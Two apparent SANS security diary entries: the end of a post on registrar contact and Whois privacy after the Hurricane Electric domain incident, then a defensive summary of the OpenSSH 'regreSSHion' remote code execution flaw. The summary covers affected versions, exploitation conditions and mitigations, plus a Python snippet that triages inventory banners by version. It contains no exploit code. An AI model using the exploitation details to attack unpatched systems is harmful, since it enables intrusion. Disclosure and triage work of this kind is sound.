And communication goes both ways. Just as you must be able to reach your registrar, your registrar must be able to reach you to resolve issues. It is unclear if Network Solutions attempted to reach out to Hurricane Electric after Network Solutions received the phishing complaint. It can also be counterproductive to use privacy features for business domains. Offering valid contact information in Whois may help someone report an issue to you directly versus going through a registrar first. Of course, this will not help if the report is meant to be malicious.

The Hurricane Electric incident is still very fresh, and we may not yet know all the details, but keep an eye out for any post mortems with more details from either Hurricane Electric or Network Solutions.

[1] https://x.com/henet/status/1808953880404787288
[2] https://puck.nether.net/pipermail/outages/2024-July/015214.html

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

Published: 2024-07-01

SSH "regreSSHion" Remote Code Execution Vulnerability in OpenSSH.

Qualys published a blog post with details regarding a critical remote code execution vulnerability [1].

This week is far from ideal to have to deal with a critical vulnerability in widely used software like OpenSSH. So I want to save you some time by summarizing the most important points in a very brief post:

  • The CVEs associated with this vulnerability are CVE-2006-5051 and CVE-2024-6387.
  • The reason for the two CVE numbers, and for the use of the old 2006 CVE number, is that this is a regression: an old vulnerability that came back. Sadly, this happens somewhat regularly (not with OpenSSH, but with software in general) if developers do not add tests to ensure the vulnerability stays patched in future versions. Missing comments are another reason for these regressions: a developer may remove a test they consider unnecessary.
  • The vulnerability allows arbitrary remote code execution without authentication.
  • OpenSSH versions up to 4.4p1 are vulnerable to CVE-2006-5051.
  • OpenSSH versions from 8.5p1 up to 9.8p1, which is the patched version, are vulnerable to CVE-2024-6387.
  • Remember that many Linux distributions do not increase version numbers when they backport a patch.
  • This is a timing issue, and exploitation is not easily reproducible; it takes about 10,000 attempts on x86 (32-bit).
  • The speed of exploitation is limited by the MaxStartups and LoginGraceTime settings.
  • Exploitation on AMD64 does not appear to be practical at this time.

Most Linux systems currently run on 64-bit architectures. However, this could be a big deal for legacy systems and IoT systems, in particular if no more patches are available. Limiting the rate of new connections using a network firewall may make exploitation less likely in these cases. First of all, a patch should be applied. But if no patch is available, port knocking, moving the server to an odd port, or allowlisting specific IPs may be options.
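As an added example (not from this post or from Qualys), this Python snippet classifies sshd version banners collected from your own host inventory against the two affected ranges summarized above, and flags vendor-tagged builds, whose version string says nothing about backported fixes. The banner regex, the range tuples and the inventory entries are constructed for the example.

```python
import re

# Affected ranges as summarized above, as (major, minor, portable patch) tuples:
# up to 4.4p1 for CVE-2006-5051, and 8.5p1 up to the patched 9.8p1 for CVE-2024-6387.
OLD_MAX = (4, 4, 1)                         # inclusive upper bound
REGRESSION_RANGE = ((8, 5, 1), (9, 8, 1))   # lower inclusive, upper exclusive

# Matches the identification string sshd sends, e.g. "SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.3".
BANNER_RE = re.compile(r"OpenSSH_(\d+)\.(\d+)(?:p(\d+))?(?:\s+(\S.*))?")

def parse_banner(banner):
    """Split a banner into ((major, minor, patch), vendor suffix or None)."""
    m = BANNER_RE.search(banner)
    if not m:
        raise ValueError(f"not an OpenSSH banner: {banner!r}")
    major, minor, patch, suffix = m.groups()
    return (int(major), int(minor), int(patch or 0)), suffix

def classify(banner):
    """Return (cve or None, note); the note states how much the version alone proves."""
    version, suffix = parse_banner(banner)
    if version <= OLD_MAX:
        cve = "CVE-2006-5051"
    elif REGRESSION_RANGE[0] <= version < REGRESSION_RANGE[1]:
        cve = "CVE-2024-6387"
    else:
        cve = None
    if cve and suffix:
        # Distributions backport fixes without bumping the upstream version, so a
        # vendor-tagged build needs the package changelog or advisory to confirm.
        return cve, f"version in affected range, but '{suffix}' may carry a backported fix"
    if cve:
        return cve, "version in affected range"
    return None, "version outside affected ranges"

def triage(inventory):
    """Classify (host, banner) pairs; returns (host, cve or None, note) per host."""
    return [(host, *classify(banner)) for host, banner in inventory]

# Constructed inventory; host names and banners are made-up examples.
SAMPLE_INVENTORY = [
    ("build-01", "SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.3"),
    ("legacy-cam", "SSH-2.0-OpenSSH_4.3"),
    ("bastion", "SSH-2.0-OpenSSH_9.8p1"),
    ("dev-box", "SSH-2.0-OpenSSH_8.4p1"),
    ("appliance", "SSH-2.0-OpenSSH_9.1p1"),
]
```

Hosts that come back with a CVE and no vendor suffix are the ones to patch or isolate first; the vendor-tagged ones need the distribution advisory checked before they are cleared.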

[1] https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu